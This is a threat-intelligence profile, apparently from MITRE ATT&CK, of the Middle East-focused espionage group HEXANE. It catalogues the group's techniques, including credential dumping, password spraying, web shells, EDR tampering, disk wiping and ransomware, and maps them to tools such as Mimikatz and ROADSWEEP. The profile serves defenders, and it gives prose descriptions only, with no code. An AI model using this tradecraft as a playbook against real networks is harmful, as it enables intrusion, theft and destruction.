1. Home
  2. Groups
  3. HEXANE

HEXANE

HEXANE is a cyber espionage threat group that has targeted oil & gas, telecommunications, aviation, and internet service provider organizations since at least 2017. Targeted companies have been located in the Middle East and Africa, including Israel, Saudi Arabia, Kuwait, Morocco, and Tunisia. HEXANE's TTPs appear similar to APT33 and OilRig but due to differences in victims and tools it is tracked as a separate entity.[1][2][3][4]

ID: G1001
Associated Groups: Lyceum, Siamesekitten, Spirlin
Contributors: Dragos Threat Intelligence; Mindaugas Gudzis, BT Security
Version: 2.3
Created: 17 October 2018
Last Modified: 14 August 2024
Version Permalink

Associated Group Descriptions

Name Description
Lyceum

[5]
Siamesekitten

[3]
Spirlin

[4]

Campaigns

ID Name First Seen Last Seen References Techniques
C0038 HomeLand Justice May 2021 [6][7][8] September 2022 [8]

HEXANE probed victim infrastructure in support of HomeLand Justice.[7]

 Access Token Manipulation: Token Impersonation/Theft, Account Discovery: Email Account, Account Manipulation: Additional Email Delegate Permissions, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter: PowerShell, Data Encrypted for Impact, Disk Wipe: Disk Structure Wipe, Email Collection: Remote Email Collection, Exfiltration Over C2 Channel, Exploit Public-Facing Application, Impair Defenses: Disable or Modify Tools, Impair Defenses: Disable Windows Event Logging, Ingress Tool Transfer, Lateral Tool Transfer, Masquerading: Match Legitimate Name or Location, Network Service Discovery, Obtain Capabilities: Code Signing Certificates, Obtain Capabilities: Tool, OS Credential Dumping: LSASS Memory, Remote Services: Remote Desktop Protocol, Remote Services: SMB/Windows Admin Shares, Server Software Component: Web Shell, Valid Accounts: Default Accounts, Valid Accounts, Windows Management Instrumentation
Enterprise Layer
download view

Techniques Used

Domain ID Name Use
Enterprise T1134 .001 Access Token Manipulation: Token Impersonation/Theft

During HomeLand Justice, threat actors used custom tooling to acquire tokens using ImpersonateLoggedOnUser/SetThreadToken.[7]
Enterprise T1087 .003 Account Discovery: Email Account

During HomeLand Justice, threat actors used compromised Exchange accounts to search mailboxes for administrator accounts.[8]
Enterprise T1098 .002 Account Manipulation: Additional Email Delegate Permissions

During HomeLand Justice, threat actors added the ApplicationImpersonation management role to accounts under their control to impersonate users and take ownership of targeted mailboxes.[7]
Enterprise T1583 .001 Acquire Infrastructure: Domains

HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.[5][1][3]
.002 Acquire Infrastructure: DNS Server

HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records.[9]
Enterprise T1010 Application Window Discovery

HEXANE has used a PowerShell-based keylogging tool to capture the window title.[5]
Enterprise T1110 Brute Force

HEXANE has used brute force attacks to compromise valid credentials.[5]
.003 Password Spraying

HEXANE has used password spraying attacks to obtain valid credentials.[5]
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

HEXANE has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.[5][10][2]

During HomeLand Justice, threat actors used PowerShell cmdlets New-MailboxSearch and Get-Recipient for discovery.[8][7]
.003 Command and Scripting Interpreter: Windows Command Shell

During HomeLand Justice, threat actors used Windows batch files for persistence and execution.[8][7]
.005 Command and Scripting Interpreter: Visual Basic

HEXANE has used a VisualBasic script named MicrosoftUpdator.vbs for execution of a PowerShell keylogger.[2]
Enterprise T1586 .002 Compromise Accounts: Email Accounts

HEXANE has used compromised accounts to send spearphishing emails.[5]
Enterprise T1555 Credentials from Password Stores

HEXANE has run cmdkey on victim machines to identify stored credentials.[2]
.003 Credentials from Web Browsers

HEXANE has used a Mimikatz-based tool and a PowerShell script to steal passwords from Google Chrome.[2]
Enterprise T1486 Data Encrypted for Impact

During HomeLand Justice, threat actors used ROADSWEEP ransomware to encrypt files on targeted systems.[6][8][7]
Enterprise T1561 .002 Disk Wipe: Disk Structure Wipe

During HomeLand Justice, threat actors used a version of ZeroCleare to wipe disk drives on targeted hosts.[8][7]
Enterprise T1114 .002 Email Collection: Remote Email Collection

During HomeLand Justice, threat actors made multiple HTTP POST requests to the Exchange servers of the victim organization to transfer data.[8]
Enterprise T1585 .001 Establish Accounts: Social Media Accounts

HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.[3]
.002 Establish Accounts: Email Accounts

HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.[2]
Enterprise T1546 .003 Event Triggered Execution: Windows Management Instrumentation Event Subscription

HEXANE has used WMI event subscriptions for persistence.[2]
Enterprise T1041 Exfiltration Over C2 Channel

During HomeLand Justice, threat actors used HTTP to transfer data from compromised Exchange servers.[8]
Enterprise T1567 .002 Exfiltration Over Web Service: Exfiltration to Cloud Storage

HEXANE has used cloud services, including OneDrive, for data exfiltration.[11]
Enterprise T1190 Exploit Public-Facing Application

For HomeLand Justice, threat actors exploited CVE-2019-0604 in Microsoft SharePoint for initial access.[8]
Enterprise T1589 Gather Victim Identity Information

HEXANE has identified specific potential victims at targeted organizations.[3]
.002 Email Addresses

HEXANE has targeted executives, human resources staff, and IT personnel for spearphishing.[5][3]
Enterprise T1591 .004 Gather Victim Org Information: Identify Roles

HEXANE has identified executives, HR, and IT staff at victim organizations for further targeting.[5][3]
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

During HomeLand Justice, threat actors modified and disabled components of endpoint detection and response (EDR) solutions including Microsoft Defender Antivirus.[7]
.002 Impair Defenses: Disable Windows Event Logging

During HomeLand Justice, threat actors deleted Windows events and application logs.[7]
Enterprise T1105 Ingress Tool Transfer

HEXANE has downloaded additional payloads and malicious scripts onto a compromised host.[2]

During HomeLand Justice, threat actors used web shells to download files to compromised infrastructure.[7]
Enterprise T1056 .001 Input Capture: Keylogging

HEXANE has used a PowerShell-based keylogger named kl.ps1.[5][2]
Enterprise T1534 Internal Spearphishing

HEXANE has conducted internal spearphishing attacks against executives, HR, and IT personnel to gain information and access.[5]
Enterprise T1570 Lateral Tool Transfer

During HomeLand Justice, threat actors initiated a process named Mellona.exe to spread the ROADSWEEP file encryptor and a persistence script to a list of internal machines.[8]
Enterprise T1036 .005 Masquerading: Match Legitimate Name or Location

During HomeLand Justice, threat actors renamed ROADSWEEP to GoXML.exe and ZeroCleare to cl.exe.[8][6]
Enterprise T1046 Network Service Discovery

During HomeLand Justice, threat actors executed the Advanced Port Scanner tool on compromised systems.[8][7]
Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

HEXANE has used Base64-encoded scripts.[2]
Enterprise T1588 .002 Obtain Capabilities: Tool

HEXANE has acquired, and sometimes customized, open source tools such as Mimikatz, Empire, VNC remote access software, and DIG.net.[2][5][9]

During HomeLand Justice, threat actors used tools including Advanced Port Scanner, Mimikatz, and Impacket.[8][7]
.003 Obtain Capabilities: Code Signing Certificates

During HomeLand Justice, threat actors used tools with legitimate code signing certificates. [8]
Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

During HomeLand Justice, threat actors dumped LSASS memory on compromised hosts.[8]
Enterprise T1069 .001 Permission Groups Discovery: Local Groups

HEXANE has run net localgroup to enumerate local groups.[2]
Enterprise T1057 Process Discovery

HEXANE has enumerated processes on targeted systems.[2]
Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

HEXANE has used remote desktop sessions for lateral movement.[5]

During HomeLand Justice, threat actors primarily used RDP for lateral movement in the victim environment.[8][7]
.002 Remote Services: SMB/Windows Admin Shares

During HomeLand Justice, threat actors used SMB for lateral movement.[8][7]
Enterprise T1018 Remote System Discovery

HEXANE has used net view to enumerate domain machines.[2]
Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

HEXANE has used a scheduled task to establish persistence for a keylogger.[2]
Enterprise T1505 .003 Server Software Component: Web Shell

For HomeLand Justice, threat actors used .aspx webshells named pickers.aspx, error4.aspx, and ClientBin.aspx, to maintain persistence.[8][7]
Enterprise T1518 Software Discovery

HEXANE has enumerated programs installed on an infected machine.[2]
Enterprise T1608 .001 Stage Capabilities: Upload Malware

HEXANE has staged malware on fraudulent websites set up to impersonate targeted organizations.[3]
Enterprise T1082 System Information Discovery

HEXANE has collected the hostname of a compromised machine.[2]
Enterprise T1016 System Network Configuration Discovery

HEXANE has used Ping and tracert for network discovery.[2]
.001 Internet Connection Discovery

HEXANE has used tools including BITSAdmin to test internet connectivity from compromised hosts.[2]
Enterprise T1049 System Network Connections Discovery

HEXANE has used netstat to monitor connections to specific ports.[2]
Enterprise T1033 System Owner/User Discovery

HEXANE has run whoami on compromised machines to identify the current user.[2]
Enterprise T1204 .002 User Execution: Malicious File

HEXANE has relied on victim's executing malicious file attachments delivered via email or embedded within actor-controlled websites to deliver malware.[5][1][3][9]
Enterprise T1078 .001 Valid Accounts: Default Accounts

During HomeLand Justice, threat actors used the built-in administrator account to move laterally using RDP and Impacket.[7]
Enterprise T1102 .002 Web Service: Bidirectional Communication

HEXANE has used cloud services, including OneDrive, for C2.[11]
Enterprise T1047 Windows Management Instrumentation

During HomeLand Justice, threat actors used WMI to modify Windows Defender settings.[7]

Software

ID Name References Techniques
S0190 BITSAdmin [2] BITS Jobs, Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S1149 CHIMNEYSWEEP [6] Abuse Elevation Control Mechanism: Bypass User Account Control, Application Layer Protocol: Web Protocols, Clipboard Data, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: PowerShell, Data Encoding: Non-Standard Encoding, Data from Local System, Data Staged: Local Data Staging, Deobfuscate/Decode Files or Information, Execution Guardrails, Exfiltration Over C2 Channel, File and Directory Discovery, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Modify Registry, Native API, Obfuscated Files or Information, Obfuscated Files or Information: Embedded Payloads, Obfuscated Files or Information: Binary Padding, Obfuscated Files or Information: Dynamic API Resolution, Peripheral Device Discovery, Process Discovery, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Subvert Trust Controls: Code Signing, System Binary Proxy Execution: CMSTP, System Owner/User Discovery, System Shutdown/Reboot, Web Service
S1014 DanBot [5] Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Visual Basic, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Deobfuscate/Decode Files or Information, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading: Match Legitimate Name or Location, Obfuscated Files or Information: Encrypted/Encoded File, Phishing: Spearphishing Attachment, Remote Services: VNC, Scheduled Task/Job: Scheduled Task, User Execution: Malicious File
S1021 DnsSystem [9] Application Layer Protocol: DNS, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Data Encoding: Standard Encoding, Data from Local System, Exfiltration Over C2 Channel, Ingress Tool Transfer, System Owner/User Discovery, User Execution: Malicious File
S0363 Empire [5] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: SID-History Injection, Access Token Manipulation, Access Token Manipulation: Create Process with Token, Account Discovery: Domain Account, Account Discovery: Local Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data, Automated Collection, Automated Exfiltration, Boot or Logon Autostart Execution: Security Support Provider, Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Boot or Logon Autostart Execution: Shortcut Modification, Browser Information Discovery, Clipboard Data, Command and Scripting Interpreter: PowerShell, Command and Scripting Interpreter: Windows Command Shell, Command and Scripting Interpreter, Create Account: Local Account, Create Account: Domain Account, Create or Modify System Process: Windows Service, Credentials from Password Stores: Credentials from Web Browsers, Domain or Tenant Policy Modification: Group Policy Modification, Domain Trust Discovery, Email Collection: Local Email Collection, Encrypted Channel: Asymmetric Cryptography, Event Triggered Execution: Accessibility Features, Exfiltration Over C2 Channel, Exfiltration Over Web Service: Exfiltration to Code Repository, Exfiltration Over Web Service: Exfiltration to Cloud Storage, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Group Policy Discovery, Hijack Execution Flow: Path Interception by Unquoted Path, Hijack Execution Flow: Path Interception by Search Order Hijacking, Hijack Execution Flow: Path Interception by PATH Environment Variable, Hijack Execution Flow: Dylib Hijacking, Hijack Execution Flow: DLL Search Order Hijacking, Indicator Removal: Timestomp, Ingress Tool Transfer, Input Capture: Keylogging, Input Capture: Credential API Hooking, Native API, Network Service Discovery, Network Share Discovery, Network Sniffing, Obfuscated Files or Information: Command Obfuscation, OS Credential Dumping: LSASS Memory, Process Discovery, Process Injection, Remote Services: Distributed Component Object Model, Remote Services: SSH, Scheduled Task/Job: Scheduled Task, Screen Capture, Software Discovery: Security Software Discovery, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Services: Service Execution, Trusted Developer Utilities Proxy Execution: MSBuild, Unsecured Credentials: Credentials In Files, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Video Capture, Web Service: Bidirectional Communication, Windows Management Instrumentation
S0095 ftp [8] Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol, Ingress Tool Transfer, Lateral Tool Transfer
S0357 Impacket [7] Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Network Sniffing, OS Credential Dumping: NTDS, OS Credential Dumping: LSASS Memory, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSA Secrets, Steal or Forge Kerberos Tickets: Kerberoasting, Steal or Forge Kerberos Tickets: Ccache Files, System Services: Service Execution, Windows Management Instrumentation
S0100 ipconfig [3][9] System Network Configuration Discovery
S1020 Kevin [2] Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Data Encoding: Standard Encoding, Data from Local System, Data Obfuscation: Junk Data, Data Staged, Data Transfer Size Limits, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Exfiltration Over C2 Channel, Fallback Channels, Hide Artifacts: Hidden Window, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading: Rename System Utilities, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Protocol Tunneling, System Information Discovery, System Network Configuration Discovery, Virtualization/Sandbox Evasion
S1015 Milan [2][4] Account Discovery: Local Account, Application Layer Protocol: DNS, Application Layer Protocol: Web Protocols, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Data Staged: Local Data Staging, Dynamic Resolution: Domain Generation Algorithms, Indicator Removal: File Deletion, Ingress Tool Transfer, Inter-Process Communication: Component Object Model, Masquerading, Masquerading: Double File Extension, Native API, Obfuscated Files or Information: Encrypted/Encoded File, Protocol Tunneling, Query Registry, Scheduled Task/Job: Scheduled Task, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery
S0002 Mimikatz [2] Access Token Manipulation: SID-History Injection, Account Manipulation, Boot or Logon Autostart Execution: Security Support Provider, Credentials from Password Stores, Credentials from Password Stores: Credentials from Web Browsers, Credentials from Password Stores: Windows Credential Manager, OS Credential Dumping: DCSync, OS Credential Dumping: Security Account Manager, OS Credential Dumping: LSASS Memory, OS Credential Dumping: LSA Secrets, Rogue Domain Controller, Steal or Forge Authentication Certificates, Steal or Forge Kerberos Tickets: Golden Ticket, Steal or Forge Kerberos Tickets: Silver Ticket, Unsecured Credentials: Private Keys, Use Alternate Authentication Material: Pass the Hash, Use Alternate Authentication Material: Pass the Ticket
S0104 netstat [2] System Network Connections Discovery
S0097 Ping [3] Remote System Discovery
S0378 PoshC2 [5] Abuse Elevation Control Mechanism: Bypass User Account Control, Access Token Manipulation: Create Process with Token, Access Token Manipulation, Account Discovery: Local Account, Account Discovery: Domain Account, Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay, Application Layer Protocol: Web Protocols, Archive Collected Data: Archive via Utility, Automated Collection, Brute Force, Credentials from Password Stores, Domain Trust Discovery, Event Triggered Execution: Windows Management Instrumentation Event Subscription, Exploitation for Privilege Escalation, Exploitation of Remote Services, File and Directory Discovery, Input Capture: Keylogging, Network Service Discovery, Network Sniffing, OS Credential Dumping: LSASS Memory, Password Policy Discovery, Permission Groups Discovery: Local Groups, Process Injection, Proxy, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Service Discovery, System Services: Service Execution, Unsecured Credentials: Credentials In Files, Use Alternate Authentication Material: Pass the Hash, Windows Management Instrumentation
S0364 RawDisk [8][7] Data Destruction, Disk Wipe: Disk Structure Wipe, Disk Wipe: Disk Content Wipe
S1150 ROADSWEEP [6] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Command and Scripting Interpreter: Windows Command Shell, Data Encrypted for Impact, Defacement: Internal Defacement, Deobfuscate/Decode Files or Information, Execution Guardrails, File and Directory Discovery, Indicator Removal: File Deletion, Inhibit System Recovery, Inter-Process Communication, Obfuscated Files or Information: Encrypted/Encoded File, Peripheral Device Discovery, Service Stop, Subvert Trust Controls: Code Signing, System Information Discovery
S1019 Shark [2][4] Application Layer Protocol: Web Protocols, Application Layer Protocol: DNS, Command and Scripting Interpreter: Windows Command Shell, Data from Local System, Data Staged, Deobfuscate/Decode Files or Information, Dynamic Resolution: Domain Generation Algorithms, Exfiltration Over C2 Channel, Fallback Channels, Indicator Removal: File Deletion, Ingress Tool Transfer, Masquerading: Match Legitimate Name or Location, Obfuscated Files or Information: Encrypted/Encoded File, Query Registry, Scheduled Transfer, System Information Discovery, Virtualization/Sandbox Evasion: System Checks
S1151 ZeroCleare [8][7] Command and Scripting Interpreter, Command and Scripting Interpreter: PowerShell, Disk Wipe: Disk Structure Wipe, Exploitation for Privilege Escalation, Indicator Removal: File Deletion, Native API, Subvert Trust Controls: Code Signing, System Information Discovery

References

  1. Dragos. (n.d.). Hexane. Retrieved October 27, 2019.
  2. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.
  3. ClearSky Cyber Security . (2021, August). New Iranian Espionage Campaign By “Siamesekitten” - Lyceum. Retrieved June 6, 2022.
  4. Accenture. (2021, November 9). Who are latest targets of cyber group Lyceum?. Retrieved June 16, 2022.
  5. SecureWorks 2019, August 27 LYCEUM Takes Center Stage in Middle East Campaign Retrieved. 2019/11/19
  6. Jenkins, L. at al. (2022, August 4). ROADSWEEP Ransomware - Likely Iranian Threat Actor Conducts Politically Motivated Disruptive Activity Against Albanian Government Organizations. Retrieved August 6, 2024.
  1. MSTIC. (2022, September 8). Microsoft investigates Iranian attacks against the Albanian government. Retrieved August 6, 2024.
  2. CISA. (2022, September 23). AA22-264A Iranian State Actors Conduct Cyber Operations Against the Government of Albania. Retrieved August 6, 2024.
  3. Shivtarkar, N. and Kumar, A. (2022, June 9). Lyceum .NET DNS Backdoor. Retrieved June 23, 2022.
  4. GReAT . (2021, April 27). APT trends report Q1 2021. Retrieved June 6, 2022.
  5. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.